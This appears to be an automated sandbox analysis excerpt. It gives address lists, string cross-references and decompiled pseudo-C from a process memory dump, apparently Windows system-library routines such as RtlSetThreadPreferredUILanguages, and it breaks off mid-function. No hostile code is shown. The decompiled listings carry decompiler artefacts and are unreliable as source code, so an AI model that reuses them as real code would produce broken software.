                                                              0x04b9e64c
                                                              0x04b9e64c
                                                              0x04b9e651
                                                              0x00000000
                                                              0x00000000
                                                              0x04b9e661
                                                              0x04b9e665
                                                              0x04bf542a
                                                              0x04b9e715
                                                              0x04b9e71a
                                                              0x04b9e71c
                                                              0x04b9e720
                                                              0x04b9e720
                                                              0x04b9e727
                                                              0x04b9e736
                                                              0x04b9e736
                                                              0x04b9e743
                                                              0x04b9e743
                                                              0x04b9e673
                                                              0x04b9e678
                                                              0x04b9e67d
                                                              0x04b9e682
                                                              0x04b9e685
                                                              0x04b9e692
                                                              0x04b9e69b
                                                              0x04b9e6a3
                                                              0x04b9e6ad
                                                              0x04b9e6b1
                                                              0x04b9e6b2
                                                              0x04b9e6bb
                                                              0x04b9e6bf
                                                              0x04b9e6c0
                                                              0x04b9e6c8
                                                              0x04b9e6cc
                                                              0x04b9e6d5
                                                              0x04b9e6d9
                                                              0x00000000
                                                              0x00000000
                                                              0x04b9e6e5
                                                              0x04b9e6ea
                                                              0x04b9e6f9
                                                              0x04b9e70b
                                                              0x04b9e70f
                                                              0x04bf5439
                                                              0x04bf545e
                                                              0x04bf545e
                                                              0x00000000
                                                              0x04bf545e
                                                              0x04bf543b
                                                              0x04bf543e
                                                              0x04bf5440
                                                              0x04bf5445
                                                              0x04bf5472
                                                              0x04bf5475
                                                              0x04bf548d
                                                              0x04bf5493
                                                              0x04bf54a9
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf54ab
                                                              0x04bf54b4
                                                              0x04bf54bc
                                                              0x04bf54c8
                                                              0x04bf54de
                                                              0x04bf54fb
                                                              0x04bf54e0
                                                              0x04bf54e6
                                                              0x04bf54eb
                                                              0x04bf54eb
                                                              0x04bf54de
                                                              0x00000000
                                                              0x04bf54bc
                                                              0x04bf5477
                                                              0x04bf547a
                                                              0x04bf5480
                                                              0x04bf5483
                                                              0x04bf5486
                                                              0x04bf548b
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf548b
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf5447
                                                              0x04bf5447
                                                              0x04bf5447
                                                              0x04bf5447
                                                              0x04bf544e
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf5450
                                                              0x04bf5452
                                                              0x04bf5455
                                                              0x04bf545a
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf545c
                                                              0x04bf546a
                                                              0x04bf546d
                                                              0x04bf546f
                                                              0x00000000
                                                              0x04bf546f
                                                              0x04b9e70f

                                                              Strings
                                                              • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 04B9E68C
                                                              • InstallLanguageFallback, xrefs: 04B9E6DB
                                                              • @, xrefs: 04B9E6C0
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                              • API String ID: 0-1757540487
                                                              • Opcode ID: e37d331cff04af1b3cb21bfdcb5759a088ec5eebbf3f31cb57e140b7c5bf6a45
                                                              • Instruction ID: 99f5e9a98d0eafcfcd0d466eb8a5233ec2fdb436677f280d08907b1076a915db
                                                              • Opcode Fuzzy Hash: e37d331cff04af1b3cb21bfdcb5759a088ec5eebbf3f31cb57e140b7c5bf6a45
                                                              • Instruction Fuzzy Hash: 3B516371508355ABDB24DF64C840A6BB3E8EF88715F0549AEF989D7250F734FD0887A2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 78%
                                                              			E04B9B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                              				signed int _t65;
                                                              				signed short _t69;
                                                              				intOrPtr _t70;
                                                              				signed short _t85;
                                                              				void* _t86;
                                                              				signed short _t89;
                                                              				signed short _t91;
                                                              				intOrPtr _t92;
                                                              				intOrPtr _t97;
                                                              				intOrPtr* _t98;
                                                              				signed short _t99;
                                                              				signed short _t101;
                                                              				void* _t102;
                                                              				char* _t103;
                                                              				signed short _t104;
                                                              				intOrPtr* _t110;
                                                              				void* _t111;
                                                              				void* _t114;
                                                              				intOrPtr* _t115;
                                                              
                                                              				_t109 = __esi;
                                                              				_t108 = __edi;
                                                              				_t106 = __edx;
                                                              				_t95 = __ebx;
                                                              				_push(0x90);
                                                              				_push(0x4c6f7a8);
                                                              				E04BED0E8(__ebx, __edi, __esi);
                                                              				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                              				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                              				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                              				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                              				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                              				if(__edx == 0xffffffff) {
                                                              					L6:
                                                              					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                              					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                              					__eflags = _t65 & 0x00000002;
                                                              					if((_t65 & 0x00000002) != 0) {
                                                              						L3:
                                                              						L4:
                                                              						return E04BED130(_t95, _t108, _t109);
                                                              					}
                                                              					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                              					_t108 = 0;
                                                              					_t109 = 0;
                                                              					_t95 = 0;
                                                              					__eflags = 0;
                                                              					while(1) {
                                                              						__eflags = _t95 - 0x200;
                                                              						if(_t95 >= 0x200) {
                                                              							break;
                                                              						}
                                                              						E04BDD000(0x80);
                                                              						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                              						_t108 = _t115;
                                                              						_t95 = _t95 - 0xffffff80;
                                                              						_t17 = _t114 - 4;
                                                              						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                              						__eflags =  *_t17;
                                                              						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                              						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                              						_t102 = _t110 + 1;
                                                              						do {
                                                              							_t85 =  *_t110;
                                                              							_t110 = _t110 + 1;
                                                              							__eflags = _t85;
                                                              						} while (_t85 != 0);
                                                              						_t111 = _t110 - _t102;
                                                              						_t21 = _t95 - 1; // -129
                                                              						_t86 = _t21;
                                                              						__eflags = _t111 - _t86;
                                                              						if(_t111 > _t86) {
                                                              							_t111 = _t86;
                                                              						}
                                                              						E04BDF3E0(_t108, _t106, _t111);
                                                              						_t115 = _t115 + 0xc;
                                                              						_t103 = _t111 + _t108;
                                                              						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                              						_t89 = _t95 - _t111;
                                                              						__eflags = _t89;
                                                              						_push(0);
                                                              						if(_t89 == 0) {
                                                              							L15:
                                                              							_t109 = 0xc000000d;
                                                              							goto L16;
                                                              						} else {
                                                              							__eflags = _t89 - 0x7fffffff;
                                                              							if(_t89 <= 0x7fffffff) {
                                                              								L16:
                                                              								 *(_t114 - 0x94) = _t109;
                                                              								__eflags = _t109;
                                                              								if(_t109 < 0) {
                                                              									__eflags = _t89;
                                                              									if(_t89 != 0) {
                                                              										 *_t103 = 0;
                                                              									}
                                                              									L26:
                                                              									 *(_t114 - 0xa0) = _t109;
                                                              									 *(_t114 - 4) = 0xfffffffe;
                                                              									__eflags = _t109;
                                                              									if(_t109 >= 0) {
                                                              										L31:
                                                              										_t98 = _t108;
                                                              										_t39 = _t98 + 1; // 0x1
                                                              										_t106 = _t39;
                                                              										do {
                                                              											_t69 =  *_t98;
                                                              											_t98 = _t98 + 1;
                                                              											__eflags = _t69;
                                                              										} while (_t69 != 0);
                                                              										_t99 = _t98 - _t106;
                                                              										__eflags = _t99;
                                                              										L34:
                                                              										_t70 =  *[fs:0x30];
                                                              										__eflags =  *((char*)(_t70 + 2));
                                                              										if( *((char*)(_t70 + 2)) != 0) {
                                                              											L40:
                                                              											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                              											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                              											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                              											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                              											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                              											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                              											 *(_t114 - 4) = 1;
                                                              											_push(_t114 - 0x74);
                                                              											L04BEDEF0(_t99, _t106);
                                                              											 *(_t114 - 4) = 0xfffffffe;
                                                              											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                              											goto L3;
                                                              										}
                                                              										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                              										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                              											goto L40;
                                                              										}
                                                              										_push( *((intOrPtr*)(_t114 + 8)));
                                                              										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                              										_push(_t99 & 0x0000ffff);
                                                              										_push(_t108);
                                                              										_push(1);
                                                              										_t101 = E04BDB280();
                                                              										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                              										if( *((char*)(_t114 + 0x14)) == 1) {
                                                              											__eflags = _t101 - 0x80000003;
                                                              											if(_t101 == 0x80000003) {
                                                              												E04BDB7E0(1);
                                                              												_t101 = 0;
                                                              												__eflags = 0;
                                                              											}
                                                              										}
                                                              										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                              										goto L4;
                                                              									}
                                                              									__eflags = _t109 - 0x80000005;
                                                              									if(_t109 == 0x80000005) {
                                                              										continue;
                                                              									}
                                                              									break;
                                                              								}
                                                              								 *(_t114 - 0x90) = 0;
                                                              								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                              								_t91 = E04BDE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                              								_t115 = _t115 + 0x10;
                                                              								_t104 = _t91;
                                                              								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                              								__eflags = _t104;
                                                              								if(_t104 < 0) {
                                                              									L21:
                                                              									_t109 = 0x80000005;
                                                              									 *(_t114 - 0x90) = 0x80000005;
                                                              									L22:
                                                              									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                                              									L23:
                                                              									 *(_t114 - 0x94) = _t109;
                                                              									goto L26;
                                                              								}
                                                              								__eflags = _t104 - _t92;
                                                              								if(__eflags > 0) {
                                                              									goto L21;
                                                              								}
                                                              								if(__eflags == 0) {
                                                              									goto L22;
                                                              								}
                                                              								goto L23;
                                                              							}
                                                              							goto L15;
                                                              						}
                                                              					}
                                                              					__eflags = _t109;
                                                              					if(_t109 >= 0) {
                                                              						goto L31;
                                                              					}
                                                              					__eflags = _t109 - 0x80000005;
                                                              					if(_t109 != 0x80000005) {
                                                              						goto L31;
                                                              					}
                                                              					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                              					_t38 = _t95 - 1; // -129
                                                              					_t99 = _t38;
                                                              					goto L34;
                                                              				}
                                                              				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                              					__eflags = __edx - 0x65;
                                                              					if(__edx != 0x65) {
                                                              						goto L2;
                                                              					}
                                                              					goto L6;
                                                              				}
                                                              				L2:
                                                              				_push( *((intOrPtr*)(_t114 + 8)));
                                                              				_push(_t106);
                                                              				if(E04BDA890() != 0) {
                                                              					goto L6;
                                                              				}
                                                              				goto L3;
                                                              			}























                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: _vswprintf_s
                                                              • String ID:
                                                              • API String ID: 677850445-0
                                                              • Opcode ID: 4dc1cd61413dac1aca11ebde11442562da73400dd7a08403eab40146869c4b5f
                                                              • Instruction ID: fdb17d6565dfa41289e416a5eef72a1e45e3867eb1161982d7ab40b5a1f2bcdc
                                                              • Opcode Fuzzy Hash: 4dc1cd61413dac1aca11ebde11442562da73400dd7a08403eab40146869c4b5f
                                                              • Instruction Fuzzy Hash: B651CD71E042698EEF31CF688844BAEBBB0FF50714F1081EDD95DAB681D77069898B90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 76%
                                                              			E04BBB944(signed int* __ecx, char __edx) {
                                                              				signed int _v8;
                                                              				signed int _v16;
                                                              				signed int _v20;
                                                              				char _v28;
                                                              				signed int _v32;
                                                              				char _v36;
                                                              				signed int _v40;
                                                              				intOrPtr _v44;
                                                              				signed int* _v48;
                                                              				signed int _v52;
                                                              				signed int _v56;
                                                              				intOrPtr _v60;
                                                              				intOrPtr _v64;
                                                              				intOrPtr _v68;
                                                              				intOrPtr _v72;
                                                              				intOrPtr _v76;
                                                              				char _v77;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				intOrPtr* _t65;
                                                              				intOrPtr _t67;
                                                              				intOrPtr _t68;
                                                              				char* _t73;
                                                              				intOrPtr _t77;
                                                              				intOrPtr _t78;
                                                              				signed int _t82;
                                                              				intOrPtr _t83;
                                                              				void* _t87;
                                                              				char _t88;
                                                              				intOrPtr* _t89;
                                                              				intOrPtr _t91;
                                                              				void* _t97;
                                                              				intOrPtr _t100;
                                                              				void* _t102;
                                                              				void* _t107;
                                                              				signed int _t108;
                                                              				intOrPtr* _t112;
                                                              				void* _t113;
                                                              				intOrPtr* _t114;
                                                              				intOrPtr _t115;
                                                              				intOrPtr _t116;
                                                              				intOrPtr _t117;
                                                              				signed int _t118;
                                                              				void* _t130;
                                                              
                                                              				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                              				_v8 =  *0x4c8d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                              				_t112 = __ecx;
                                                              				_v77 = __edx;
                                                              				_v48 = __ecx;
                                                              				_v28 = 0;
                                                              				_t5 = _t112 + 0xc; // 0x575651ff
                                                              				_t105 =  *_t5;
                                                              				_v20 = 0;
                                                              				_v16 = 0;
                                                              				if(_t105 == 0) {
                                                              					_t50 = _t112 + 4; // 0x5de58b5b
                                                              					_t60 =  *__ecx |  *_t50;
                                                              					if(( *__ecx |  *_t50) != 0) {
                                                              						 *__ecx = 0;
                                                              						__ecx[1] = 0;
                                                              						if(E04BB7D50() != 0) {
                                                              							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              						} else {
                                                              							_t65 = 0x7ffe0386;
                                                              						}
                                                              						if( *_t65 != 0) {
                                                              							E04C68CD6(_t112);
                                                              						}
                                                              						_push(0);
                                                              						_t52 = _t112 + 0x10; // 0x778df98b
                                                              						_push( *_t52);
                                                              						_t60 = E04BD9E20();
                                                              					}
                                                              					L20:
                                                              					_pop(_t107);
                                                              					_pop(_t113);
                                                              					_pop(_t87);
                                                              					return E04BDB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                              				}
                                                              				_t8 = _t112 + 8; // 0x8b000cc2
                                                              				_t67 =  *_t8;
                                                              				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                              				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                              				_t108 =  *(_t67 + 0x14);
                                                              				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                              				_t105 = 0x2710;
                                                              				asm("sbb eax, edi");
                                                              				_v44 = _t88;
                                                              				_v52 = _t108;
                                                              				_t60 = E04BDCE00(_t97, _t68, 0x2710, 0);
                                                              				_v56 = _t60;
                                                              				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                              					L3:
                                                              					 *(_t112 + 0x44) = _t60;
                                                              					_t105 = _t60 * 0x2710 >> 0x20;
                                                              					 *_t112 = _t88;
                                                              					 *(_t112 + 4) = _t108;
                                                              					_v20 = _t60 * 0x2710;
                                                              					_v16 = _t60 * 0x2710 >> 0x20;
                                                              					if(_v77 != 0) {
                                                              						L16:
                                                              						_v36 = _t88;
                                                              						_v32 = _t108;
                                                              						if(E04BB7D50() != 0) {
                                                              							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              						} else {
                                                              							_t73 = 0x7ffe0386;
                                                              						}
                                                              						if( *_t73 != 0) {
                                                              							_t105 = _v40;
                                                              							E04C68F6A(_t112, _v40, _t88, _t108);
                                                              						}
                                                              						_push( &_v28);
                                                              						_push(0);
                                                              						_push( &_v36);
                                                              						_t48 = _t112 + 0x10; // 0x778df98b
                                                              						_push( *_t48);
                                                              						_t60 = E04BDAF60();
                                                              						goto L20;
                                                              					} else {
                                                              						_t89 = 0x7ffe03b0;
                                                              						do {
                                                              							_t114 = 0x7ffe0010;
                                                              							do {
                                                              								_t77 =  *0x4c88628; // 0x0
                                                              								_v68 = _t77;
                                                              								_t78 =  *0x4c8862c; // 0x0
                                                              								_v64 = _t78;
                                                              								_v72 =  *_t89;
                                                              								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                              								while(1) {
                                                              									_t105 =  *0x7ffe000c;
                                                              									_t100 =  *0x7ffe0008;
                                                              									if(_t105 ==  *_t114) {
                                                              										goto L8;
                                                              									}
                                                              									asm("pause");
                                                              								}
                                                              								L8:
                                                              								_t89 = 0x7ffe03b0;
                                                              								_t115 =  *0x7ffe03b0;
                                                              								_t82 =  *0x7FFE03B4;
                                                              								_v60 = _t115;
                                                              								_t114 = 0x7ffe0010;
                                                              								_v56 = _t82;
                                                              							} while (_v72 != _t115 || _v76 != _t82);
                                                              							_t83 =  *0x4c88628; // 0x0
                                                              							_t116 =  *0x4c8862c; // 0x0
                                                              							_v76 = _t116;
                                                              							_t117 = _v68;
                                                              						} while (_t117 != _t83 || _v64 != _v76);
                                                              						asm("sbb edx, [esp+0x24]");
                                                              						_t102 = _t100 - _v60 - _t117;
                                                              						_t112 = _v48;
                                                              						_t91 = _v44;
                                                              						asm("sbb edx, eax");
                                                              						_t130 = _t105 - _v52;
                                                              						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                              							_t88 = _t102 - _t91;
                                                              							asm("sbb edx, edi");
                                                              							_t108 = _t105;
                                                              						} else {
                                                              							_t88 = 0;
                                                              							_t108 = 0;
                                                              						}
                                                              						goto L16;
                                                              					}
                                                              				} else {
                                                              					if( *(_t112 + 0x44) == _t60) {
                                                              						goto L20;
                                                              					}
                                                              					goto L3;
                                                              				}
                                                              			}

















































                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04BBB9A5
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID:
                                                              • API String ID: 885266447-0
                                                              • Opcode ID: 485bc38d31667811fe1094d13a34010bbc650db8939670a7d9755c7818dc89df
                                                              • Instruction ID: 02da6e1a01fa1ee047eeac89e77dab22c3e164971106a0ac2a83529c3460b63b
                                                              • Opcode Fuzzy Hash: 485bc38d31667811fe1094d13a34010bbc650db8939670a7d9755c7818dc89df
                                                              • Instruction Fuzzy Hash: 84515871A08300CFC720DF28C480A6ABBE5FB88614F5489AEE5D597754EBB0FD45CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 80%
                                                              			E04BCFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                              				char _v5;
                                                              				signed int _v8;
                                                              				signed int _v12;
                                                              				char _v16;
                                                              				char _v17;
                                                              				char _v20;
                                                              				signed int _v24;
                                                              				char _v28;
                                                              				char _v32;
                                                              				signed int _v40;
                                                              				void* __ecx;
                                                              				void* __edi;
                                                              				void* __ebp;
                                                              				signed int _t73;
                                                              				intOrPtr* _t75;
                                                              				signed int _t77;
                                                              				signed int _t79;
                                                              				signed int _t81;
                                                              				intOrPtr _t83;
                                                              				intOrPtr _t85;
                                                              				intOrPtr _t86;
                                                              				signed int _t91;
                                                              				signed int _t94;
                                                              				signed int _t95;
                                                              				signed int _t96;
                                                              				signed int _t106;
                                                              				signed int _t108;
                                                              				signed int _t114;
                                                              				signed int _t116;
                                                              				signed int _t118;
                                                              				signed int _t122;
                                                              				signed int _t123;
                                                              				void* _t129;
                                                              				signed int _t130;
                                                              				void* _t132;
                                                              				intOrPtr* _t134;
                                                              				signed int _t138;
                                                              				signed int _t141;
                                                              				signed int _t147;
                                                              				intOrPtr _t153;
                                                              				signed int _t154;
                                                              				signed int _t155;
                                                              				signed int _t170;
                                                              				void* _t174;
                                                              				signed int _t176;
                                                              				signed int _t177;
                                                              
                                                              				_t129 = __ebx;
                                                              				_push(_t132);
                                                              				_push(__esi);
                                                              				_t174 = _t132;
                                                              				_t73 =  !( *( *(_t174 + 0x18)));
                                                              				if(_t73 >= 0) {
                                                              					L5:
                                                              					return _t73;
                                                              				} else {
                                                              					E04BAEEF0(0x4c87b60);
                                                              					_t134 =  *0x4c87b84; // 0x77f07b80
                                                              					_t2 = _t174 + 0x24; // 0x24
                                                              					_t75 = _t2;
                                                              					if( *_t134 != 0x4c87b80) {
                                                              						_push(3);
                                                              						asm("int 0x29");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						_push(0x4c87b60);
                                                              						_t170 = _v8;
                                                              						_v28 = 0;
                                                              						_v40 = 0;
                                                              						_v24 = 0;
                                                              						_v17 = 0;
                                                              						_v32 = 0;
                                                              						__eflags = _t170 & 0xffff7cf2;
                                                              						if((_t170 & 0xffff7cf2) != 0) {
                                                              							L43:
                                                              							_t77 = 0xc000000d;
                                                              						} else {
                                                              							_t79 = _t170 & 0x0000000c;
                                                              							__eflags = _t79;
                                                              							if(_t79 != 0) {
                                                              								__eflags = _t79 - 0xc;
                                                              								if(_t79 == 0xc) {
                                                              									goto L43;
                                                              								} else {
                                                              									goto L9;
                                                              								}
                                                              							} else {
                                                              								_t170 = _t170 | 0x00000008;
                                                              								__eflags = _t170;
                                                              								L9:
                                                              								_t81 = _t170 & 0x00000300;
                                                              								__eflags = _t81 - 0x300;
                                                              								if(_t81 == 0x300) {
                                                              									goto L43;
                                                              								} else {
                                                              									_t138 = _t170 & 0x00000001;
                                                              									__eflags = _t138;
                                                              									_v24 = _t138;
                                                              									if(_t138 != 0) {
                                                              										__eflags = _t81;
                                                              										if(_t81 != 0) {
                                                              											goto L43;
                                                              										} else {
                                                              											goto L11;
                                                              										}
                                                              									} else {
                                                              										L11:
                                                              										_push(_t129);
                                                              										_t77 = E04BA6D90( &_v20);
                                                              										_t130 = _t77;
                                                              										__eflags = _t130;
                                                              										if(_t130 >= 0) {
                                                              											_push(_t174);
                                                              											__eflags = _t170 & 0x00000301;
                                                              											if((_t170 & 0x00000301) == 0) {
                                                              												_t176 = _a8;
                                                              												__eflags = _t176;
                                                              												if(__eflags == 0) {
                                                              													L64:
                                                              													_t83 =  *[fs:0x18];
                                                              													_t177 = 0;
                                                              													__eflags =  *(_t83 + 0xfb8);
                                                              													if( *(_t83 + 0xfb8) != 0) {
                                                              														E04BA76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                              														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                              													}
                                                              													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                              													goto L15;
                                                              												} else {
                                                              													asm("sbb edx, edx");
                                                              													_t114 = E04C38938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                              													__eflags = _t114;
                                                              													if(_t114 < 0) {
                                                              														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                              														E04B9B150();
                                                              													}
                                                              													_t116 = E04C36D81(_t176,  &_v16);
                                                              													__eflags = _t116;
                                                              													if(_t116 >= 0) {
                                                              														__eflags = _v16 - 2;
                                                              														if(_v16 < 2) {
                                                              															L56:
                                                              															_t118 = E04BA75CE(_v20, 5, 0);
                                                              															__eflags = _t118;
                                                              															if(_t118 < 0) {
                                                              																L67:
                                                              																_t130 = 0xc0000017;
                                                              																goto L32;
                                                              															} else {
                                                              																__eflags = _v12;
                                                              																if(_v12 == 0) {
                                                              																	goto L67;
                                                              																} else {
                                                              																	_t153 =  *0x4c88638; // 0x2e6f098
                                                              																	_t122 = L04BA38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                              																	_t154 = _v12;
                                                              																	_t130 = _t122;
                                                              																	__eflags = _t130;
                                                              																	if(_t130 >= 0) {
                                                              																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                              																		__eflags = _t123;
                                                              																		if(_t123 != 0) {
                                                              																			_t155 = _a12;
                                                              																			__eflags = _t155;
                                                              																			if(_t155 != 0) {
                                                              																				 *_t155 = _t123;
                                                              																			}
                                                              																			goto L64;
                                                              																		} else {
                                                              																			E04BA76E2(_t154);
                                                              																			goto L41;
                                                              																		}
                                                              																	} else {
                                                              																		E04BA76E2(_t154);
                                                              																		_t177 = 0;
                                                              																		goto L18;
                                                              																	}
                                                              																}
                                                              															}
                                                              														} else {
                                                              															__eflags =  *_t176;
                                                              															if( *_t176 != 0) {
                                                              																goto L56;
                                                              															} else {
                                                              																__eflags =  *(_t176 + 2);
                                                              																if( *(_t176 + 2) == 0) {
                                                              																	goto L64;
                                                              																} else {
                                                              																	goto L56;
                                                              																}
                                                              															}
                                                              														}
                                                              													} else {
                                                              														_t130 = 0xc000000d;
                                                              														goto L32;
                                                              													}
                                                              												}
                                                              												goto L35;
                                                              											} else {
                                                              												__eflags = _a8;
                                                              												if(_a8 != 0) {
                                                              													_t77 = 0xc000000d;
                                                              												} else {
                                                              													_v5 = 1;
                                                              													L04BCFCE3(_v20, _t170);
                                                              													_t177 = 0;
                                                              													__eflags = 0;
                                                              													L15:
                                                              													_t85 =  *[fs:0x18];
                                                              													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                              													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                              														L18:
                                                              														__eflags = _t130;
                                                              														if(_t130 != 0) {
                                                              															goto L32;
                                                              														} else {
                                                              															__eflags = _v5 - _t130;
                                                              															if(_v5 == _t130) {
                                                              																goto L32;
                                                              															} else {
                                                              																_t86 =  *[fs:0x18];
                                                              																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                                              																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                                              																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                                              																}
                                                              																__eflags = _t177;
                                                              																if(_t177 == 0) {
                                                              																	L31:
                                                              																	__eflags = 0;
                                                              																	L04BA70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                                              																	goto L32;
                                                              																} else {
                                                              																	__eflags = _v24;
                                                              																	_t91 =  *(_t177 + 0x20);
                                                              																	if(_v24 != 0) {
                                                              																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                                              																		goto L31;
                                                              																	} else {
                                                              																		_t141 = _t91 & 0x00000040;
                                                              																		__eflags = _t170 & 0x00000100;
                                                              																		if((_t170 & 0x00000100) == 0) {
                                                              																			__eflags = _t141;
                                                              																			if(_t141 == 0) {
                                                              																				L74:
                                                              																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                                              																				goto L27;
                                                              																			} else {
                                                              																				_t177 = E04BCFD22(_t177);
                                                              																				__eflags = _t177;
                                                              																				if(_t177 == 0) {
                                                              																					goto L42;
                                                              																				} else {
                                                              																					_t130 = E04BCFD9B(_t177, 0, 4);
                                                              																					__eflags = _t130;
                                                              																					if(_t130 != 0) {
                                                              																						goto L42;
                                                              																					} else {
                                                              																						_t68 = _t177 + 0x20;
                                                              																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                                              																						__eflags =  *_t68;
                                                              																						_t91 =  *(_t177 + 0x20);
                                                              																						goto L74;
                                                              																					}
                                                              																				}
                                                              																			}
                                                              																			goto L35;
                                                              																		} else {
                                                              																			__eflags = _t141;
                                                              																			if(_t141 != 0) {
                                                              																				_t177 = E04BCFD22(_t177);
                                                              																				__eflags = _t177;
                                                              																				if(_t177 == 0) {
                                                              																					L42:
                                                              																					_t77 = 0xc0000001;
                                                              																					goto L33;
                                                              																				} else {
